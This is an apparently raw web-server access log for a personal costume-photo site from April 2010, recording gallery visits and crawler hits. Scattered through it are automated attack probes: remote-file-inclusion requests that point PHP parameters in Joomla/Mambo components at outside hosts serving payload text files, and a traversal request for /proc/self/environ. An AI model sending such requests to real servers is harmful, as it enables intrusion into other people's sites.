94.241.129.62 - - [21/Apr/2010:06:44:34 -0500] "GET /costume/017_JPG%20copy.jpg HTTP/1.1" 200 45390 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:06:44:44 -0500] "GET /logs/access_log.1158451200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.241.129.62 - - [21/Apr/2010:06:44:45 -0500] "GET /costume/021_JPG%20copy.jpg HTTP/1.1" 200 46071 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:06:46:39 -0500] "GET /logs/access_log.1232582400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:06:47:55 -0500] "GET /logs/access_log.1229817600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.49 - - [21/Apr/2010:06:48:29 -0500] "GET /logs/access_log.1225756800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.72.194.58 - - [21/Apr/2010:06:49:19 -0500] "GET //?DOCUMENT_ROOT=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:06:49:19 -0500] "GET /logs//?DOCUMENT_ROOT=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:06:49:19 -0500] "GET /logs/access_log.1217548800%20%20//?DOCUMENT_ROOT=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:06:49:29 -0500] "GET /logs/access_log.1217462400%20%20//?DOCUMENT_ROOT=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
94.241.129.62 - - [21/Apr/2010:06:49:57 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:49:59 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 3450 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:50:06 -0500] "GET /costume/025_JPG%20copy.jpg HTTP/1.1" 200 48186 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:50:12 -0500] "GET /costume/026_JPG%20copy.jpg HTTP/1.1" 200 46929 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:06:50:27 -0500] "GET /logs/access_log.1197849600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.241.129.62 - - [21/Apr/2010:06:50:35 -0500] "GET /costume/027_JPG%20copy.jpg HTTP/1.1" 200 46009 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:50:54 -0500] "GET /costume/032_JPG%20copy.jpg HTTP/1.1" 200 46966 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:50:56 -0500] "GET /costume/029_JPG%20copy.jpg HTTP/1.1" 200 47959 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:51:23 -0500] "GET /costume/031_JPG%20copy.jpg HTTP/1.1" 200 44271 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:51:26 -0500] "GET /costume/034_JPG%20copy.jpg HTTP/1.1" 200 43973 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:51:55 -0500] "GET /costume/036_JPG%20copy.jpg HTTP/1.1" 200 44291 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:51:59 -0500] "GET /costume/035_JPG%20copy.jpg HTTP/1.1" 200 55068 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:06:52:21 -0500] "GET /logs/access_log.1167955200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.241.129.62 - - [21/Apr/2010:06:52:29 -0500] "GET /costume/033_JPG%20copy.jpg HTTP/1.1" 200 46394 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:52:30 -0500] "GET /costume/028_JPG%20copy.jpg HTTP/1.1" 200 51488 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:52:55 -0500] "GET /costume/030_JPG%20copy.jpg HTTP/1.1" 200 45745 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:06:54:53 -0500] "GET /logs/access_log.1207872000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.241.129.62 - - [21/Apr/2010:06:56:59 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:57:06 -0500] "GET /costume/038_JPG%20copy.jpg HTTP/1.1" 200 46731 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:57:13 -0500] "GET /costume/037_JPG%20copy.jpg HTTP/1.1" 200 46400 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:06:57:25 -0500] "GET /logs/access_log.1180051200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.39 - - [21/Apr/2010:06:57:27 -0500] "GET /logs/access_log.1261353600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.241.129.62 - - [21/Apr/2010:06:57:36 -0500] "GET /costume/039_JPG%20copy.jpg HTTP/1.1" 200 46480 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:57:43 -0500] "GET /costume/041_JPG%20copy.jpg HTTP/1.1" 200 47808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:58:06 -0500] "GET /costume/043_JPG%20copy.jpg HTTP/1.1" 200 45534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:58:13 -0500] "GET /costume/046_JPG%20copy.jpg HTTP/1.1" 200 46590 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:58:37 -0500] "GET /costume/047_JPG%20copy.jpg HTTP/1.1" 200 46201 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:58:45 -0500] "GET /costume/042_JPG%20copy.jpg HTTP/1.1" 200 43788 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:59:14 -0500] "GET /costume/048_JPG%20copy.jpg HTTP/1.1" 200 50534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:59:18 -0500] "GET /costume/040_JPG%20copy.jpg HTTP/1.1" 200 49303 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:06:59:19 -0500] "GET /logs/access_log.1246147200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.241.129.62 - - [21/Apr/2010:06:59:44 -0500] "GET /costume/044_JPG%20copy.jpg HTTP/1.1" 200 46286 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:00:52 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:00:58 -0500] "GET /costume/050_JPG%20copy.jpg HTTP/1.1" 200 41544 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:01:11 -0500] "GET /costume/049_JPG%20copy.jpg HTTP/1.1" 200 46261 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:02:01 -0500] "GET /costume/052_JPG%20copy.jpg HTTP/1.1" 200 45569 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:02:16 -0500] "GET /costume/054_JPG%20copy.jpg HTTP/1.1" 200 42090 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:07:02:30 -0500] "GET /logs/access_log.1217721600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.241.129.62 - - [21/Apr/2010:07:03:17 -0500] "GET /costume/055_JPG%20copy.jpg HTTP/1.1" 200 47426 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:07:04:24 -0500] "GET /logs/access_log.1166227200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.241.129.62 - - [21/Apr/2010:07:05:31 -0500] "GET /costume/057_JPG%20copy.jpg HTTP/1.1" 200 45023 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
85.25.141.101 - - [21/Apr/2010:07:05:43 -0500] "GET //?DOCUMENT_ROOT=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
85.25.141.101 - - [21/Apr/2010:07:05:43 -0500] "GET /logs//?DOCUMENT_ROOT=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
85.25.141.101 - - [21/Apr/2010:07:05:44 -0500] "GET /logs/access_log.1217548800%20%20//?DOCUMENT_ROOT=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
94.241.129.62 - - [21/Apr/2010:07:05:44 -0500] "GET /costume/059_JPG%20copy.jpg HTTP/1.1" 200 43881 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
85.25.141.101 - - [21/Apr/2010:07:05:44 -0500] "GET /logs/access_log.1217462400%20%20//?DOCUMENT_ROOT=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
195.190.166.35 - - [21/Apr/2010:07:06:16 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
195.190.166.35 - - [21/Apr/2010:07:06:16 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
195.190.166.35 - - [21/Apr/2010:07:06:16 -0500] "GET /logs/access_log.1225929600//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
94.241.129.62 - - [21/Apr/2010:07:06:17 -0500] "GET /costume/060_JPG%20copy.jpg HTTP/1.1" 200 44423 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:06:48 -0500] "GET /costume/053_JPG%20copy.jpg HTTP/1.1" 200 47421 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:07:27 -0500] "GET /costume/056_JPG%20copy.jpg HTTP/1.1" 200 45237 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:07:07:33 -0500] "GET /logs/access_log.1206057600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.241.129.62 - - [21/Apr/2010:07:07:56 -0500] "GET /costume/058_JPG%20copy.jpg HTTP/1.1" 200 47636 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:08:47 -0500] "GET /costume/051_JPG%20copy.jpg HTTP/1.1" 200 46644 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
163.24.136.10 - - [21/Apr/2010:07:09:24 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
163.24.136.10 - - [21/Apr/2010:07:09:24 -0500] "GET //?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
163.24.136.10 - - [21/Apr/2010:07:09:24 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
82.22.207.181 - - [21/Apr/2010:07:09:31 -0500] "GET //index.php?option=com_simpleboard&func=view&catid=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
82.22.207.181 - - [21/Apr/2010:07:09:31 -0500] "GET /logs//index.php?option=com_simpleboard&func=view&catid=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
82.22.207.181 - - [21/Apr/2010:07:09:31 -0500] "GET /logs/access_log.1271030400%20%20//index.php?option=com_simpleboard&func=view&catid=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.214.161.203 - - [21/Apr/2010:07:09:40 -0500] "GET //?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.214.161.203 - - [21/Apr/2010:07:09:40 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.214.161.203 - - [21/Apr/2010:07:09:40 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
65.55.216.9 - - [21/Apr/2010:07:09:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
163.24.136.10 - - [21/Apr/2010:07:10:29 -0500] "GET //?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
163.24.136.10 - - [21/Apr/2010:07:10:29 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
163.24.136.10 - - [21/Apr/2010:07:10:29 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:10:43 -0500] "GET /logs/access_log.1199664000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:07:13:51 -0500] "GET /logs/access_log.1269561600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [21/Apr/2010:07:14:13 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [21/Apr/2010:07:15:45 -0500] "GET /logs/access_log.1160265600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
82.22.207.181 - - [21/Apr/2010:07:16:01 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
82.22.207.181 - - [21/Apr/2010:07:16:01 -0500] "GET /logs/access_log.1220054400%20%20/components/com_simpleboard/image_upload.php?sbp=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
82.22.207.181 - - [21/Apr/2010:07:16:01 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
81.52.143.33 - - [21/Apr/2010:07:16:53 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
94.241.129.62 - - [21/Apr/2010:07:17:11 -0500] "GET /costume/thmb6.htm HTTP/1.1" 200 3210 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:17:12 -0500] "GET /costume/costume62%20copy.JPG HTTP/1.1" 200 16357 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:17:12 -0500] "GET /costume/costume61%20copy.JPG HTTP/1.1" 200 18054 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:17:44 -0500] "GET /costume/costume63%20copy.JPG HTTP/1.1" 200 17743 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:17:48 -0500] "GET /costume/costume65%20copy.JPG HTTP/1.1" 200 18435 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:17:59 -0500] "GET /costume/costume66%20copy.JPG HTTP/1.1" 200 17118 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:18:12 -0500] "GET /costume/costume67%20copy.JPG HTTP/1.1" 200 17016 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:18:12 -0500] "GET /costume/costume68%20copy.JPG HTTP/1.1" 200 17278 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:07:18:16 -0500] "GET /logs/access_log.1169769600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.241.129.62 - - [21/Apr/2010:07:18:30 -0500] "GET /costume/costume69%20copy.JPG HTTP/1.1" 200 16551 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:18:41 -0500] "GET /costume/costume64%20copy.JPG HTTP/1.1" 200 16453 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:18:56 -0500] "GET /costume/costume70.JPG HTTP/1.1" 200 60587 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:19:06 -0500] "GET /costume/costume71%20copy.JPG HTTP/1.1" 200 15824 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:07:19:18 -0500] "GET /costume/costume72%20copy.JPG HTTP/1.1" 200 17645 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [21/Apr/2010:07:20:47 -0500] "GET /logs/access_log.1255132800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
195.190.166.35 - - [21/Apr/2010:07:21:57 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
195.190.166.35 - - [21/Apr/2010:07:22:01 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
195.190.166.35 - - [21/Apr/2010:07:22:02 -0500] "GET /logs/access_log.1219708800//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:22:03 -0500] "GET /logs/access_log.1163894400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
195.190.166.35 - - [21/Apr/2010:07:23:22 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
195.190.166.35 - - [21/Apr/2010:07:23:22 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
195.190.166.35 - - [21/Apr/2010:07:23:22 -0500] "GET //?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
122.201.100.182 - - [21/Apr/2010:07:23:55 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
122.201.100.182 - - [21/Apr/2010:07:23:55 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
122.201.100.182 - - [21/Apr/2010:07:23:55 -0500] "GET /logs/access_log.1223164800//include/print_category.php?setup[use_category]=1&dir=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
93.90.185.234 - - [21/Apr/2010:07:24:12 -0500] "GET /logs/access_log.1220054400//components/com_simpleboard/image_upload.php?sbp=http://www.3four2.com.au//cmdstate.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:24:12 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.3four2.com.au//cmdstate.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:24:12 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.3four2.com.au//cmdstate.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:24:12 -0500] "GET /logs/access_log.1220054400//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:24:13 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:24:13 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:24:13 -0500] "GET /logs/access_log.1220054400//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 355 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
